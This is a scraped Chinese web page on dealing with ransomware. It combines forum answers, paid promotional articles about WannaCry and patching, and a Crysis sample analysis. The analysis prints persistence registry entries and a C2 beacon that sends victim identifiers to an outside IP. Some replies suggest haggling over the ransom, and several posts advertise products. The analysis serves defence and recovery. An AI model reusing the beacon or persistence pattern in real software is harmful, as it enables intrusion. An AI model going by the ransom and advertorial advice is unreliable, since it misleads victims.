电脑中了勒索病毒怎么处理 中了勒索病毒能恢复吗
按时间排序
由于以前国内多次爆发利用445端口传播的蠕虫，运营商对个人用户已封掉445端口，但是教育网并没有此限制，仍然存在大量暴露445端口的机器。据有关机构统计，目前国内平均每天有5000多台机器遭到NSA“永恒之蓝”黑客武器的远程攻击，教育网是受攻击的重灾区。目前微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞，请尽快为电脑安装此补丁;对于XP、2003等微软已不再提供安全更新的机器，推荐使用“NSA武器库免疫工具”检测系统是否存在漏洞，并关闭受到漏洞影响的端口，可以避免遭到勒索软件等病毒的侵害。如果以上方案不行的话,可以参考以下网友们的办法：1、不要给钱。即使交了之后未必能恢复数据。2、迅速多次备份数据。已中毒的，重装系统前把硬盘低格3、安装反勒索防护工具，不要访问可疑网站、不打开可疑邮件和文件4、关闭电脑包括TCP和UDP协议135和445端口，win7系统格外注意，不要使用校园网落，cmcc也不行5、还看不懂的，把网掐了。
方法一：交赎金
如果你的资料非常重要，你可以考虑向一些成功人士学习发送邮件跟勒索的人砍砍价。非常合适的方法，前提是你的资料足够重要，你又有充足的时间来和攻击者交流。
同时你也非常急需的话，那么这是唯一的出路完整的解密所有文件。方法二：使用360提供的安全工具
就目前而言360提供的文件提取工具可能无法完整的将所有文件都正确的提取出来，相信360在未来的几天会陆续的更新这方面的解锁进度。如果文件不是很重要建议尝试。方法三：直接重新安装操作系统
根据朋友给出的意见，在操作发现系统文件正在被加密上锁或者提前发现系统异常时，直接拔掉电源关机。使用PE工具 如老毛桃等进入系统转义重要文件。然后重新安装操作系统。
下载最新版的360杀毒软件试试吧，
如果电脑中毒或者中木马建议快速杀毒建议楼主下载安装腾讯电脑管家来进行杀毒，重启电脑按F8进入安全模式--打开腾讯电脑管家--闪电杀毒--全盘扫描--完成重启电脑就可以了，腾讯电脑管家是一款杀毒软件腾讯电脑管家杀毒管理二合一，16层实时防护，自带小红伞、金山等4大病毒搜索引擎，能够及时拦截钓鱼网站及木马病毒。占用资源比较少，不影响楼主办公娱乐。
这个看对方了，一般来说不可能的。
感谢您为社区的和谐贡献力量请选择举报类型
经过核实后将会做出处理感谢您为社区和谐做出贡献
确定要取消此次报名，退出该活动？
请输入私信内容：中了crypt勒索病毒所有资料文件被加密怎么处理
按时间排序
这种病毒就是这一点特别的不好可以使用电脑管家先去给电脑杀毒，把病毒从电脑里面删除了然后它的工具箱里面，其实有一个文件解密的功能，使用这个功能，再去把文件给恢复到正常使用的状态就可以了。
如果确认中毒，不要尝试插网线或者优盘。请按照下面方案处理：1.关闭电脑包括TCP和UDP协议135和445端口教程：；2.安装反勒索防护工具、文档卫士，尝试恢复被加密的文件。具体的你可以去360论坛进行技术咨询
都3了，2都没几个人能解决了，认栽吧，格系统，重新做系统，文件重新搞
1，装个电脑管家在你的电脑上面2，然后在工具箱了里免找到勒索病毒专杀工具3，使用这个工具就可以把病毒从电脑上彻底删除了
手机上的文件是不会受到勒索病毒的影响的，但如果手机连接了被感染的电脑，那么你手机上sd卡内的文件可能会被锁，所以要注意安全操作，但又不用过于担心。
这样的情况个人建议打开安全卫士里的反勒索服务，这样就可以解决。
感谢您为社区的和谐贡献力量请选择举报类型
经过核实后将会做出处理感谢您为社区和谐做出贡献
确定要取消此次报名，退出该活动？
请输入私信内容：勒索病毒文件怎么恢复？勒索病毒文件解密技能
稿源：站长之家用户
最近已经被“勒索病毒”刷屏了，每天打开电脑看到的就是勒索病毒文件恢复解决方法，看来还是有很多人已经中招了。但是勒索病毒出现的时候，大家还觉得这样的病毒不是什么大事，不会影响到我们的电脑数据安全的。但是实际上呢?很多人被啪啪打脸了。那么，这个勒索病毒究竟是怎么回事呢?一、windows勒索病毒是什么?既然我们想要解决勒索病毒的问题，那就需要先了解清楚，勒索病毒究竟是什么东西。这其实是一种名为“WannaCry”的家族新成员，结合蠕虫的方式进行传播，攻击互联网以及局域网上的机器。二、电脑被勒索病毒感染会怎样?都说是一种勒索病毒了，所以，当你的电脑被感染之后，你电脑上的文档会全部被加密、锁定，然后就会有人来跟你要赎金了。一台电脑中毒的话，有可能会影响到几千名用户，毕竟一些大公司，都是用的局域网，所以一台电脑中招的话，造成的后果是很严重的。三、交了赎金就可以解决问题了?既然说交了赎金就可以解绑你的电脑了，但是，真的有效吗?还是别傻了。据悉，勒索病毒的赎回流程，支付赎金的过程就是一个计算机弱绑定的操作，是不能够将已经支付赎金的情况传递给黑客的，所以吧，对方不知道是谁付了款，该给谁解密呵呵哒。四、勒索病毒文件恢复还是接下来说说我们大家最关注的问题吧，就是这些数据，究竟应该怎么恢复，毕竟我们自己使用的电脑上，肯定是会有很多的数据的，这些数据要是找不回来的话，对我们来说也是一个大大的损失。1、在发现电脑被勒索病毒感染之后，我们要立刻断开网络，但是不要关机，也不要去对电脑进行任何的操作。2、接下来你可以通过其他的电脑，下载一个病毒查杀工具还有强力数据恢复软件，然后再将其拷贝到电脑上安装运行。3、最后，先杀毒，然后再运行强力数据恢复软件，恢复电脑上的数据即可。五、如何提高文件恢复成功率大家也知道，电脑被勒索病毒感染后，我们不一定就可以将全部的数据找回来，所以在发现电脑被勒索病毒感染了之后，我们还可以通过一些操作，来提升文件恢复的成功率啊。1、中毒后尽快处理：大家也知道，要是时间拖得越久，操作的文件越多，就会更加容易导致数据被覆盖了，最后就会导致无法恢复数据。2、硬盘剩余空间越大，恢复成功率越高：其实新的文件在写入硬盘的时候，会先让空余的磁盘空间存储，之后才会去覆盖之前被清除的数据。所以，要是硬盘剩余的空间比较大的话，就越不容易被覆盖了，恢复成功率也大。3、文件越小越容易恢复：这个吧，和上面的原理差不多，其实小文件占用的空间小，所以也越不容易被覆盖。
本文由站长之家传媒平台（ ）分发，站长之家传媒平台旨为企业提供"全方位"的互联网品牌推广营销服务！目前，平台已经上线自助软文投放系统，对接直编、出稿更快速、价格实惠，还能获取“免费”的自媒体分发资源（头条号、百家号、搜狐号、网易号等）。
免责声明：本文为企业推广稿件，发布本文的目的在于推广其产品或服务，站长之家发布此文仅为传递信息，不代表站长之家赞同其观点，不对对内容真实性负责，仅供用户参考之用，不构成任何投资、使用等行为的建议。请读者使用之前核实真实性，以及可能存在的风险，任何后果均由读者自行承担。
有好的文章希望站长之家帮助分享推广，猛戳这里
本网页浏览已超过3分钟，点击关闭或灰色背景，即可回到网页中勒索病毒后文件如何恢复？
姓名：*电话：*QQ：*邮箱：*公司名称：*所属行业*
联系人：陈先生电　话：024-邮　箱：地　址：辽宁省沈阳市
最近，一种名叫勒索病毒的新型电脑病毒正在盛行，它是邮件等形式肆意传播的。关于这个勒索病毒从一开始的从医院到学校中招，再到后面不断扩大影响范围，此病毒对给网络用户带来了重大的损失。然而上周，外媒曝出了英国一小哥意外解决病毒拯救了整个银河系的消息，分外振奋人心。但事实上，病毒并没有终止。而是勒索病毒发生变种。那么变种之后的病毒，跟之前又有何不同，如果我们中了该病毒怎么办?中勒索病毒后如何文件恢复？下面中商创服雪鹏网络小编就跟大家简单说说。一、意外被拯救的银河系话说小哥意外拯救银河系是因为他发现了——每一个感染病毒的机器，在病毒发作之前都会访问一下一个未知的域名。如果这个域名不存在，那么这个病毒就会继续传播。于是小哥就花8.29英镑把这个域名给注册了。而且小哥还根据这个域名开发了一个攻击地图，表示只要这个域名不被注销，病毒就不会传说。二、道高一尺魔高一丈最新的勒索病毒已经出现了变种2.0版本。这个版本取消了所谓的Kill Switch，也就是说——现在小哥已经无法通过注册域名来拦截勒索蠕虫的传播了，而且现在病毒的传播速度可能更快!所以小哥的意外拯救银河系计划失败了。这场大规模的“屠杀”何时停止依旧未知......虽说我们不能及时阻止它，但是防范于未然还是可行的。三、中毒了该怎么办?1、发现电脑中毒，第一时间断网，然后格式化硬盘，这是目前行之有效的解决方法之一，可以彻底清除病毒;2、目前微软已经发布了相关的系统补丁漏洞，请尽快为电脑升级补丁;3、开启Windows自带的防火墙，然后进入“高级设置”，将“文件和打印机共享”的相关规则都关闭。随后关闭UDP135、445、137、138、139端口，关闭网络文件共享。4、单位内网，在非常时期禁止使用U盘、移动硬盘等可执行摆渡攻击的设备。5、尽快将电脑中的重要数据备份起来，最好备份到云存储上。6、将电脑系统更新到最新版本，版本越新防护程度越高，当然可能也会存在未知bug，请谨慎处理。7、注意邮件安全管理，开启邮件防护，拦截一些钓鱼网站邮件。8、安装正版软件，拒绝一切不明来源的盗版软件。如果你已经遭遇了病毒，数据发生了丢失，请安装——强力数据恢复软件，进行数据恢复，可以有效帮你找回大部分数据。以上内容由中商创服雪鹏网络分享，想了解更多勒索病毒相关内容，请大家关注中商创服雪鹏网络。
上一篇： &
下一篇： &
周一至周五 ：8:30-17:30周六至周日 ：9:00-17:00陈经理：服务器所有文件都变成.wallet后缀的文件，可能中了勒索病毒，该如何处理这个问题？ - 知乎152被浏览<strong class="NumberBoard-itemValue" title="7分享邀请回答download.sysinternals.com/files/ProcessExplorer.zip。步骤一，右键--Create Dump--Create Full Dump。步骤二，用“DiskGenius”找到系统盘（通常是C盘）的卷序列号用于定位密钥。步骤三，用16进制编辑器搜索找到的序列号，序列号上面32字节即为文件加解密密钥。=====================================================+++++++++++++++++++++++++++++++++++++++++++++++++++《样本分析》样本：space.exeMd5:2D074CEB8DB705E1A2BDCCFFVirusTotal信息:字符串：A8
C:\crysis\Release\PDB\payload.pdb文件行为：CREATE C:\WINDOWS\System32\space.exeCREATE C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\space.exe注册表行为：SetValue HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wmkvvbvr
"C:\WINDOWS\System32\space.exe"网络行为：CC地址TCP CONNECT 127.0.0.1 =& 93.89.224.41:80/////////////////POST /wp-content/themes/twentythirteen/srgprk/pass/index.php HTTP/1.0Host: Content-Type: application/x-www-form-urlencodedContent-Length: 165submit=submit&id=SRGPRK-A5AF01FC671CBE9F743C4AFA03EDDEB&guid=2033C24E-D4FAD77EDF0A76D2B6E4E2725AAE35CB24A9B2FA&pc=ADMIN-318AB4636&mail=space_//////////////////submit=submitid=SRGPRK-A5AF01FC671CBE9F743C4AFA03EDDEB（可以理解为变种id或犯罪组织下线id，代号“SRGPRK”，公钥的sha1“A5AF01FC......”）guid=B153CE4D-AEC6AD7BC30EEC9F6F752（受害者id，卷序列号“B153CE4D”，随机数“.........”）pc=ADMIN-（计算机名）mail=space_（联系邮箱）加密文件（***.space_.xtbl）格式：+++++++++++++++++++++++++++++++++++++++++++++++++++-18:40更新：本想研究下它的随机数生成器有没有弱点，看能不能枚举或预测。它的种子有256位，使用了多种当前系统状态，使用了sha1算法，目前来看不能枚举或预测。结论还是那样，如果关机或重启就没办法了。-14:45更新：在帮网友处理的过程中发现，勒索病毒在加密完文件之后，会把内存中的密钥清零。如果等它把所有的文件都加密完，再取的dump也还是找不到解密密钥。所以即使取到dump，能得到密钥的几率似乎也很小。我自己测试的时候解密成功了，是因为还没等它加密完所有文件，我就取了dump。所以取到了内存中的密钥。-15:14更新：不再接受网友求助。因为，目前为止有2位网友成功取到dump文件，我发现当恶意代码加密完所有的文件后，会把加密密钥在内存中抹掉。因此恢复不了。只能用私钥解密rsa-1024加密过的“文件加密（aes-256-cbc）密钥”。而私钥只会在攻击者手上，谁都没有办法。1528 条评论分享收藏感谢收起